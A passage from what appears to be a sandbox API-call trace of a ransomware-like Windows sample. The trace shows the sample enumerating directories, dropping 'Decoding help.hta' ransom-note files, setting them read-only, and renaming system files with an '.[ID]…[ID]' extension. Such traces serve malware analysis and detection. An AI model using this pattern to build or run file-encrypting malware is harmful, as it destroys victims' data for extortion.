Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C" [0039.141] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*.*" [0039.141] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.141] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x95f9ce8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.150] CloseHandle (hObject=0x1c4) returned 1 [0039.150] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0039.150] lstrcmpW (lpString1=".", lpString2="{90140000-0115-0409-1000-0000000FF1CE}-C") returned -1 [0039.150] lstrcmpW (lpString1="..", lpString2="{90140000-0115-0409-1000-0000000FF1CE}-C") returned -1 [0039.150] lstrcmpiW (lpString1="windows", lpString2="{90140000-0115-0409-1000-0000000FF1CE}-C") returned 1 [0039.150] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.150] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.150] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0115-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C" [0039.150] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*.*" [0039.150] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.150] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x40d0048, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.174] CloseHandle (hObject=0x1c4) returned 1 [0039.174] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0039.174] lstrcmpW (lpString1=".", lpString2="{90140000-0117-0409-1000-0000000FF1CE}-C") returned -1 [0039.174] lstrcmpW (lpString1="..", lpString2="{90140000-0117-0409-1000-0000000FF1CE}-C") returned -1 [0039.174] lstrcmpiW (lpString1="windows", lpString2="{90140000-0117-0409-1000-0000000FF1CE}-C") returned 1 [0039.174] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.174] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.174] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{90140000-0117-0409-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" [0039.174] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*.*" [0039.174] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.174] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4118180, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.182] CloseHandle (hObject=0x1c4) returned 1 [0039.182] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0039.182] lstrcmpW (lpString1=".", lpString2="{91140000-0011-0000-1000-0000000FF1CE}-C") returned -1 [0039.182] lstrcmpW (lpString1="..", lpString2="{91140000-0011-0000-1000-0000000FF1CE}-C") returned -1 [0039.182] lstrcmpiW (lpString1="windows", lpString2="{91140000-0011-0000-1000-0000000FF1CE}-C") returned 1 [0039.182] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.182] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.182] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{91140000-0011-0000-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C" [0039.183] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*.*" [0039.183] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.183] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41301e8, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.186] CloseHandle (hObject=0x1c4) returned 1 [0039.186] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5cd3a40, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa8c22f80, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa8c22f80, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-003B-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~3")) returned 1 [0039.186] lstrcmpW (lpString1=".", lpString2="{91140000-003B-0000-1000-0000000FF1CE}-C") returned -1 [0039.186] lstrcmpW (lpString1="..", lpString2="{91140000-003B-0000-1000-0000000FF1CE}-C") returned -1 [0039.186] lstrcmpiW (lpString1="windows", lpString2="{91140000-003B-0000-1000-0000000FF1CE}-C") returned 1 [0039.186] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.186] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.186] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{91140000-003B-0000-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C" [0039.186] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-003B-0000-1000-0000000FF1CE}-C\\*.*" [0039.186] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.187] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x4190388, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.204] CloseHandle (hObject=0x1c4) returned 1 [0039.204] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 1 [0039.204] lstrcmpW (lpString1=".", lpString2="{91140000-0057-0000-1000-0000000FF1CE}-C") returned -1 [0039.204] lstrcmpW (lpString1="..", lpString2="{91140000-0057-0000-1000-0000000FF1CE}-C") returned -1 [0039.204] lstrcmpiW (lpString1="windows", lpString2="{91140000-0057-0000-1000-0000000FF1CE}-C") returned 1 [0039.204] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\MSOCache\\All Users\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\*.*" [0039.204] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\*.*") returned 29 [0039.204] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\", lpString2="{91140000-0057-0000-1000-0000000FF1CE}-C" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C" [0039.204] lstrcatW (in: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C", lpString2="\\*.*" | out: lpString1="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*") returned="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0057-0000-1000-0000000FF1CE}-C\\*.*" [0039.204] GlobalMemoryStatus (in: lpBuffer=0x2f8fd10 | out: lpBuffer=0x2f8fd10) [0039.204] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x10000, lpStartAddress=0x4014cc, lpParameter=0x41c0458, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1c4 [0039.213] CloseHandle (hObject=0x1c4) returned 1 [0039.213] FindNextFileW (in: hFindFile=0x5a53f0, lpFindFileData=0x2f8fd30 | out: lpFindFileData=0x2f8fd30*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x46538340, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x4a6d41a0, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x4a6d41a0, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0057-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~2")) returned 0 [0039.213] FindClose (in: hFindFile=0x5a53f0 | out: hFindFile=0x5a53f0) returned 1 Thread: id = 25 os_tid = 0xa98 [0039.003] FindFirstFileW (in: lpFileName="\\\\?\\C:\\PerfLogs\\Admin\\*.*", lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.003] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.003] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.003] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.003] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.003] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x320fd30 | out: lpFindFileData=0x320fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd72e458, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd72e458, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xbbba4afc, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0039.003] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 26 os_tid = 0xa9c [0039.004] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*.*", lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.004] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.004] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac015040, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.004] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.004] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.004] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.005] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\cs-CZ\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*.*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*.*" [0039.005] lstrlenW (lpString="\\\\?\\C:\\Boot\\cs-CZ\\*.*") returned 21 [0039.005] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\cs-CZ\\Decoding help.hta" [0039.005] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\Decoding help.hta" (normalized: "c:\\boot\\cs-cz\\decoding help.hta")) returned 0xffffffff [0039.005] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\Decoding help.hta" (normalized: "c:\\boot\\cs-cz\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1c4 [0039.005] WriteFile (in: hFile=0x1c4, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x334fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x334fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.006] CloseHandle (hObject=0x1c4) returned 1 [0039.006] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.006] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.006] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.006] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\cs-CZ\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\*.*") returned="\\\\?\\C:\\Boot\\cs-CZ\\*.*" [0039.006] lstrlenW (lpString="\\\\?\\C:\\Boot\\cs-CZ\\*.*") returned 21 [0039.007] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0039.007] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" [0039.007] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.007] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.007] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x334fd30 | out: lpFindFileData=0x334fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.007] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 27 os_tid = 0xaa0 [0039.009] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\da-DK\\*.*", lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5a52f0 [0039.009] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0039.009] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac03b1a0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0039.009] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0039.009] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0039.009] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0039.009] lstrcpyW (in: lpString1=0x595038, lpString2="\\\\?\\C:\\Boot\\da-DK\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*.*") returned="\\\\?\\C:\\Boot\\da-DK\\*.*" [0039.009] lstrlenW (lpString="\\\\?\\C:\\Boot\\da-DK\\*.*") returned 21 [0039.009] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\Decoding help.hta") returned="\\\\?\\C:\\Boot\\da-DK\\Decoding help.hta" [0039.009] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\Decoding help.hta" (normalized: "c:\\boot\\da-dk\\decoding help.hta")) returned 0xffffffff [0039.010] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\Decoding help.hta" (normalized: "c:\\boot\\da-dk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b8 [0039.010] WriteFile (in: hFile=0x1b8, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2c0fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2c0fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0039.011] CloseHandle (hObject=0x1b8) returned 1 [0039.011] SetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0039.011] lstrcmpiW (lpString1="Decoding help.hta", lpString2="bootmgr.exe.mui") returned 1 [0039.011] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0039.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\da-DK\\*.*" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\*.*") returned="\\\\?\\C:\\Boot\\da-DK\\*.*" [0039.011] lstrlenW (lpString="\\\\?\\C:\\Boot\\da-DK\\*.*") returned 21 [0039.011] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK\\", lpString2="bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" [0039.011] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui") returned="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" [0039.011] lstrcatW (in: lpString1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" [0039.011] MoveFileW (lpExistingFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), lpNewFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0039.014] FindNextFileW (in: hFindFile=0x5a52f0, lpFindFileData=0x2c0fd30 | out: lpFindFileData=0x2c0fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe868d5aa, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15640, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0039.014] FindClose (in: hFindFile=0x5a52f0 | out: hFindFile=0x5a52f0) returned 1 Thread: id = 28 os_tid = 0xaa4 [0039.012] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\*.*", lpFindFileData=0x358fd30 | out: lpFindFileData=0x358fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x69da35f0, 